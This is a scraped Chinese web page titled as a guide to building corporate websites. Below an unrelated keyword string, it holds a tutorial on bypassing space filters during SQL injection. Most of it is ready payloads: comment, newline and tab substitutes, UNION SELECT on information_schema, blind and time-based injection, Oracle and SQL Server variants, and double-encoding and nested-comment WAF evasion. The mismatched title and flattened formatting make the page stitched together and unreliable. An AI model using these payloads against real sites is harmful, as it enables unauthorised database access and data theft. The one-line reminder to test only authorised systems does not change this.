企业官网建设流程全解析

互联网 网站建设价格,原画师,杨振峰网站开发,网站怎么做视频背景目录 空格、%20、被过滤时的测试方法 一、核心思路#xff1a;替代空格的常用字符/语法 快速验证方法 二、分场景测试方法 场景1#xff1a;GET请求参数#xff08;URL中#xff09; 步骤1#xff1a;用/**/替代空格测试基础注入 步骤2#xff1a;URL编码特殊字符被过滤时的测试方法一、核心思路替代空格的常用字符/语法快速验证方法二、分场景测试方法场景1GET请求参数URL中步骤1用/**/替代空格测试基础注入步骤2URL编码特殊字符换行/制表符步骤3括号包裹字段/表名场景2POST请求参数表单/JSON方法1用/**/替代空格方法2MySQL内联注释仅MySQL场景3盲注无报错回显布尔盲注示例MySQL时间盲注优化无空格场景4特殊数据库适配1. Oracle数据库2. SQL Server数据库三、绕过过滤的进阶技巧技巧1混合编码双重URL编码技巧2利用运算符替代空格技巧3注释嵌套绕过WAF规则四、测试注意事项五、常见问题排查空格、%20、被过滤时的测试方法在SQL注入测试中空格包括URL编码的%20、是最常用的分隔符若被WAF/代码过滤可通过特殊字符/语法替代分隔符、编码绕过、注释截断等方式突破限制本文详细讲解具体测试方法与场景适配。一、核心思路替代空格的常用字符/语法SQL语法中空格的核心作用是分隔关键字/表名/字段名以下字符/语法可等效替代空格且多数数据库兼容替代方式语法示例适用数据库说明注释符截断SELECT/**/username/**/FROM/**/usersMySQL/Oracle/SQL Server/**/是通用注释可分隔语句换行符SELECT%0Ausername%0AFROM%0Ausers所有主流数据库%0A是URL编码的换行符制表符SELECT%09username%09FROM%09users所有主流数据库%09是URL编码的制表符括号包裹SELECT(username)FROM(users)MySQL/SQL Server用括号分隔字段/表名特殊空白字符SELECT%0Busername%0BFROM%0BusersMySQL/Oracle%0B垂直制表符、%0C换页符内联注释SELECT/*!username*/FROM/*!users*/MySQLMySQL特有内联注释不影响执行快速验证方法先通过简单语句测试替代符是否生效以MySQL为例# 原正常语句空格分隔 SELECT id FROM users WHERE id1 # 替换后测试语句 SELECT/**/id/**/FROM/**/users/**/WHERE/**/id1 -- 注释符替代 SELECT%0Aid%0AFROM%0Ausers%0AWHERE%0Aid1 -- 换行符替代 SELECT(id)FROM(users)WHERE(id1) -- 括号替代二、分场景测试方法场景1GET请求参数URL中若目标URL为http://xxx.com/user.php?id1空格/%20/被过滤步骤1用/**/替代空格测试基础注入# 测试是否存在注入判断是否报错 http://xxx.com/user.php?id1/**/AND/**/11 http://xxx.com/user.php?id1/**/AND/**/12 # 联合查询测试提取表名 http://xxx.com/user.php?id-1/**/UNION/**/SELECT/**/1,group_concat(table_name),3/**/FROM/**/information_schema.tables/**/WHERE/**/table_schemadatabase()步骤2URL编码特殊字符换行/制表符若/**/也被过滤用%0A/%09替代# 换行符%0A替代 http://xxx.com/user.php?id1%0AAND%0A11 # 制表符%09替代 http://xxx.com/user.php?id1%09AND%0912步骤3括号包裹字段/表名若所有空白字符都被过滤用括号分隔http://xxx.com/user.php?id1AND(11) http://xxx.com/user.php?id-1UNION(SELECT(1),(2),(3)FROM(users))场景2POST请求参数表单/JSON若POST参数如usernameadminpassword123中空格被过滤方法1用/**/替代空格// JSON格式示例 { username: admin/**/AND/**/11#, password: 123 }// 表单格式示例 usernameadmin/**/OR/**/11password123方法2MySQL内联注释仅MySQL利用/*! */注释包裹关键字无需空格# 测试语句 usernameadmin/*!AND*/11# password123 # 提取数据 username-1/*!UNION*//*!SELECT*/1,group_concat(column_name),3/*!FROM*/information_schema.columns/*!WHERE*/table_nameusers#场景3盲注无报错回显若无法通过报错判断需结合布尔盲注/时间盲注同时替换空格布尔盲注示例MySQL# 测试数据库名长度/**/替代空格 http://xxx.com/user.php?id1/**/AND/**/length(database())8 # 时间盲注%0A替代空格 http://xxx.com/user.php?id1%0AAND%0Asleep(5)时间盲注优化无空格# 括号包裹无任何空白字符 http://xxx.com/user.php?id1AND(sleep(5))场景4特殊数据库适配1. Oracle数据库Oracle不支持/**/注释分隔优先用%0A换行符或--注释截断-- 测试语句%0A替代空格 SELECT%0Aname%0AFROM%0Ausers%0AWHERE%0Aid1 -- 注释截断无需空格 SELECT1FROM dual WHERE 11--2. SQL Server数据库支持[]包裹关键字且%09制表符兼容性更好-- 制表符替代空格 SELECT%09[name]%09FROM%09[users]%09WHERE%09[id]1 -- 括号替代 SELECT([name])FROM([users])WHERE([id]1)三、绕过过滤的进阶技巧技巧1混合编码双重URL编码若WAF过滤%0A/%09可对编码再次编码# %0A的双重编码是%250A http://xxx.com/user.php?id1%250AAND%250A11 # %09的双重编码是%2509 http://xxx.com/user.php?id1%2509AND%250912技巧2利用运算符替代空格部分场景下/-/*等运算符可间接分隔语句需结合语法# MySQL示例号分隔 SELECT 11 FROM users WHERE id1 -- 等效于 SELECT 1 1 FROM users... # 注入测试 id1AND11技巧3注释嵌套绕过WAF规则若WAF拦截/**/可嵌套注释# 嵌套注释替代空格 SELECT/*/*/id/*/*/FROM/*/*/users四、测试注意事项优先测试通用替代符先试/**/再试%0A/%09最后试括号减少测试成本适配数据库类型不同数据库对替代符的支持差异大如Oracle不支持/**/需先确认数据库类型避免触发WAF拦截部分替代符如/*! */可能被WAF标记为恶意可混合多种方式验证语句有效性替换空格后先在本地数据库测试语句是否能正常执行再用于目标站点合规测试仅对授权的系统进行测试避免违反法律法规。五、常见问题排查替代符无效检查是否数据库版本不兼容如MySQL 5.5以下对/*! */支持有限或WAF深度解析了注释/编码语句报错确认替代符位置是否正确如/**/需放在关键字之间而非首尾盲注无响应可能是替代符被过滤或目标无注入漏洞需换用其他替代方式。